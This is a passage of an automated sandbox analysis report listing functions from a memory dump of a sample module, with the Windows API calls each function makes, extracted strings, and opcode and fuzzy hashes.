                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                          • Opcode ID: fabb535afc105e0decfbfdb6db9c1eda5200b98fe264e1058d53e9e6ab103bd2
                                                                                                                                          • Instruction ID: 17006af3dd743cae48793af6676b8247c89d1152380ea2e4aa38b85dc8e36782
                                                                                                                                          • Opcode Fuzzy Hash: fabb535afc105e0decfbfdb6db9c1eda5200b98fe264e1058d53e9e6ab103bd2
                                                                                                                                          • Instruction Fuzzy Hash: 0941BE29F19A4281FB259B02A834AF96696FF58B95F094536DD3E4F3DCEE3CE4408350
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2067211477-0
                                                                                                                                          • Opcode ID: b040001a0cb2e06cd7971e6aff8f1e273238e5935e601b8e5b063557bdae92d1
                                                                                                                                          • Instruction ID: f746020d55b22bd60839fcbf3abbfe281ab743db3b6e4f3ec39cebc9a2b8ffbf
                                                                                                                                          • Opcode Fuzzy Hash: b040001a0cb2e06cd7971e6aff8f1e273238e5935e601b8e5b063557bdae92d1
                                                                                                                                          • Instruction Fuzzy Hash: 55214F2AF0974282FF149F69A4348FEA2A0AF84B81F484535DE6D4B7DDDE3CE5059740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _set_statfp
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                          • Opcode ID: 8ededab4c003fc5eb50d30b88c498eb80175c93f409c79947cc45d833528cf34
                                                                                                                                          • Instruction ID: a6c502013ddb0214d23ec57cad11f1f1a910c45b1660eaafb71cd285e3da10af
                                                                                                                                          • Opcode Fuzzy Hash: 8ededab4c003fc5eb50d30b88c498eb80175c93f409c79947cc45d833528cf34
                                                                                                                                          • Instruction Fuzzy Hash: 0E11587EF1CA0601F7781129F472BFD51817F553AAF095234EB7E0A6DECE1DA8844244
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FFDF7CADB8C: GetLastError.KERNEL32(?,?,?,00007FFDF7CA7B91,?,?,?,?,00007FFDF7CACA6B,?,?,00000000,00007FFDF7CADB31,?,?,?), ref: 00007FFDF7CADB9B
                                                                                                                                            • Part of subcall function 00007FFDF7CADB8C: SetLastError.KERNEL32(?,?,?,00007FFDF7CA7B91,?,?,?,?,00007FFDF7CACA6B,?,?,00000000,00007FFDF7CADB31,?,?,?), ref: 00007FFDF7CADC05
                                                                                                                                          • ExitThread.KERNEL32 ref: 00007FFDF7CA3F4C
                                                                                                                                          • ExitThread.KERNEL32 ref: 00007FFDF7CA3F61
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorExitLastThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1611280651-0
                                                                                                                                          • Opcode ID: ae2abdbe39501b5126202329e052ee4fe7fa4409f0de5eadbc0f8828924965ef
                                                                                                                                          • Instruction ID: 8dcfa2f57cb12dee9e1dca6ba7c8f0a01ef24d10101ea2eff2531f54a354a9e9
                                                                                                                                          • Opcode Fuzzy Hash: ae2abdbe39501b5126202329e052ee4fe7fa4409f0de5eadbc0f8828924965ef
                                                                                                                                          • Instruction Fuzzy Hash: 51011E29B1868296FB146B6198786FC22A1AF80F76F540739D63E076D9DF2CE4988300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _set_statfp
                                                                                                                                          • String ID: "$sinh
                                                                                                                                          • API String ID: 1156100317-1232919748
                                                                                                                                          • Opcode ID: 3643758de30a882a8f8f591e8e08a8aeed0c1ba10f89767e26bfdd5b49b26de4
                                                                                                                                          • Instruction ID: 6682fd103822db11dbecd1a17178373f0b617dce68be6dcaf9969795c2a4fb09
                                                                                                                                          • Opcode Fuzzy Hash: 3643758de30a882a8f8f591e8e08a8aeed0c1ba10f89767e26bfdd5b49b26de4
                                                                                                                                          • Instruction Fuzzy Hash: C391B925F18F8588E3638B34A4617F97358AF6A3D5F109337D5AE36AA9DF2C91438700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: $*
                                                                                                                                          • API String ID: 3215553584-3982473090
                                                                                                                                          • Opcode ID: 1b58e9775382402b4d775ae5f3c59ba3f45e37bcb3e1bf27df69a781bd90abda
                                                                                                                                          • Instruction ID: ada6cd960c13df518fa429389e53ec0edc9deb7f0f37fdd41e4a3538915a5648
                                                                                                                                          • Opcode Fuzzy Hash: 1b58e9775382402b4d775ae5f3c59ba3f45e37bcb3e1bf27df69a781bd90abda
                                                                                                                                          • Instruction Fuzzy Hash: DD51207AE0C6428BF7668E24C074BBC3AE1EB15B1AF141236C76A491DDCF6CD8A5C605
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _set_statfp
                                                                                                                                          • String ID: !$acos
                                                                                                                                          • API String ID: 1156100317-2870037509
                                                                                                                                          • Opcode ID: 07d545cf4db2b1446ceb485d3d67b44514844ff59f858671c097b9b673844ea4
                                                                                                                                          • Instruction ID: 0ab0496d792b9fcf7dd8bddce719f507c4e07edb78aba2aedf8a450124e93482
                                                                                                                                          • Opcode Fuzzy Hash: 07d545cf4db2b1446ceb485d3d67b44514844ff59f858671c097b9b673844ea4
                                                                                                                                          • Instruction Fuzzy Hash: A8617825E28F8585F3138B7468316F99754AFA6391F51D336E97E36AE8DF2CD0824600
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _set_statfp
                                                                                                                                          • String ID: !$asin
                                                                                                                                          • API String ID: 1156100317-2188059690
                                                                                                                                          • Opcode ID: d74fd2c3d4a11866d02b2c9ba5c1347239424a1760a41e88894f38a774cea3b2
                                                                                                                                          • Instruction ID: 6c341304a91ff95ebf5eedef5020cd4778c5bb3483111e090f061c46e34e0292
                                                                                                                                          • Opcode Fuzzy Hash: d74fd2c3d4a11866d02b2c9ba5c1347239424a1760a41e88894f38a774cea3b2
                                                                                                                                          • Instruction Fuzzy Hash: B161BD25E18F8585F353CB345C316F99354AFA63D5F509332E97E36AE9DF1DA0424600
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                          • String ID: U
                                                                                                                                          • API String ID: 2456169464-4171548499
                                                                                                                                          • Opcode ID: 38ee025a910e053c27d691d14efbbeb1de41849233a684e62a5f876355649c8f
                                                                                                                                          • Instruction ID: 82306d085df8d6cddacb8fd9825d7502c756bafcdde5e0a7a98423948c74eb43
                                                                                                                                          • Opcode Fuzzy Hash: 38ee025a910e053c27d691d14efbbeb1de41849233a684e62a5f876355649c8f
                                                                                                                                          • Instruction Fuzzy Hash: A741A526B1868182EB608F25E864BFA77A1F798794F444132EE5D87798DF3CD511CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FFDF7CF1120: GetModuleHandleW.KERNEL32 ref: 00007FFDF7CF116F
                                                                                                                                            • Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF1188
                                                                                                                                            • Part of subcall function 00007FFDF7CF1120: GetProcAddress.KERNEL32 ref: 00007FFDF7CF1198
                                                                                                                                            • Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF13A3
                                                                                                                                            • Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF142E
                                                                                                                                          • OutputDebugStringA.KERNEL32 ref: 00007FFDF7CED268
                                                                                                                                          • OutputDebugStringA.KERNEL32 ref: 00007FFDF7CED299
                                                                                                                                            • Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0268
                                                                                                                                            • Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0A7F
                                                                                                                                            • Part of subcall function 00007FFDF7CF01D0: HeapFree.KERNEL32 ref: 00007FFDF7CF0ACE
                                                                                                                                            • Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0B10
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugOutputString$AddressFreeHandleHeapModuleProc
                                                                                                                                          • String ID: API called without activation$API called without license: %ld (0x%lx)
                                                                                                                                          • API String ID: 323638051-1210341260
                                                                                                                                          • Opcode ID: e3428bc0ae786138bd28bc750f2034a99ddd2e6537b5937e316fe7cc99642038
                                                                                                                                          • Instruction ID: 46a5950e36108595ea5519caad68ad8b90d03915ee5c5a75b4dbd3709ab3ac0a
                                                                                                                                          • Opcode Fuzzy Hash: e3428bc0ae786138bd28bc750f2034a99ddd2e6537b5937e316fe7cc99642038
                                                                                                                                          • Instruction Fuzzy Hash: 86415F6AB18A8781FB119B21E871FFD2361AF95B85F440032D92E876DDDE2DE8858340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4141327611-0
                                                                                                                                          • Opcode ID: 4a9a1d822b6a8b040ec9aa0fd6a5aed8344dd3ab8f3b83e52faaa69329a41ab6
                                                                                                                                          • Instruction ID: b02738357dd677b11f54d3d9982a91fb77c556379f6c1c7c710b9330636ad344
                                                                                                                                          • Opcode Fuzzy Hash: 4a9a1d822b6a8b040ec9aa0fd6a5aed8344dd3ab8f3b83e52faaa69329a41ab6
                                                                                                                                          • Instruction Fuzzy Hash: ED41A429B0D78247FB658B199274BFE6290EF80B90F154134EAAD47ADDDF3CD8958700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFDF7CABF87,?,?,?,00007FFDF7CABF42), ref: 00007FFDF7CB2C95
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFDF7CABF87,?,?,?,00007FFDF7CABF42), ref: 00007FFDF7CB2CF7
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFDF7CABF87,?,?,?,00007FFDF7CABF42), ref: 00007FFDF7CB2D31
                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFDF7CABF87,?,?,?,00007FFDF7CABF42), ref: 00007FFDF7CB2D5B
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1557788787-0
                                                                                                                                          • Opcode ID: cb58bb46e136a436cc3296d3954f439073ad99571ec6db683707ab458abb8294
                                                                                                                                          • Instruction ID: 267c5f39dbff2ca203c1d3f5a53c484a11fba98b3ef91b48ba152e2751e82bad
                                                                                                                                          • Opcode Fuzzy Hash: cb58bb46e136a436cc3296d3954f439073ad99571ec6db683707ab458abb8294
                                                                                                                                          • Instruction Fuzzy Hash: 05219536F0879181E7609F2568104AD66A4FB88BD0B484234EE6E67BECDF3CE4628740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLast$abort
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1447195878-0
                                                                                                                                          • Opcode ID: 47afe63ff740905e512948011b226e73666ca28023fb5725211ab947658236f7
                                                                                                                                          • Instruction ID: 27bfff09ff95b95a9d41b6d45b17ebd7e6e3846ca6947f398f70c20e96ee5be8
                                                                                                                                          • Opcode Fuzzy Hash: 47afe63ff740905e512948011b226e73666ca28023fb5725211ab947658236f7
                                                                                                                                          • Instruction Fuzzy Hash: 6201002CF0974742FB69AB756579DFC1191AF84B92F141538D93E0B7DEED2DA8448200
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: gfffffff
                                                                                                                                          • API String ID: 3215553584-1523873471
                                                                                                                                          • Opcode ID: 863c0f8b7451d09d39ac029bcc34361f75aaf615dff75afee98cc58ccee12c6e
                                                                                                                                          • Instruction ID: 3f6e5d7ac1803927b5c2184df7d1b5646ca665fea021ffd6969b524dbc9c359f
                                                                                                                                          • Opcode Fuzzy Hash: 863c0f8b7451d09d39ac029bcc34361f75aaf615dff75afee98cc58ccee12c6e
                                                                                                                                          • Instruction Fuzzy Hash: B5915766F0938686EB258F2D9160BFC6B55AB217C0F058131DBAD073D9DE3DE1A2C301
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
